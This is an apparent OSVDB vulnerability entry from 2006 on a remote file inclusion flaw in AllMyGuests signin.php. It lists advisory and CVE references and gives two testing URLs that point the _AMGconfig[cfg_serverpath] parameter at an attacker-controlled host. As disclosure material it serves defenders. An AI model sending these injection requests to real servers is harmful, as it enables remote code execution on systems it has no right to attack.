AllMyGuests signin.php _AMGconfig[cfg_serverpath] Variable Remote File Inclusion

2006-09-20T14:18:42
ID OSVDB:29456
Type osvdb
Reporter OSVDB
Modified 2006-09-20T14:18:42

Description

Manual Testing Notes

http://[target]/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker http://[target]/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker

References:

Secunia Advisory ID:22095 ISS X-Force ID: 29064 Generic Exploit URL: http://www.milw0rm.com/exploits/2405 FrSIRT Advisory: ADV-2006-3863 CVE-2006-4993 Bugtraq ID: 20303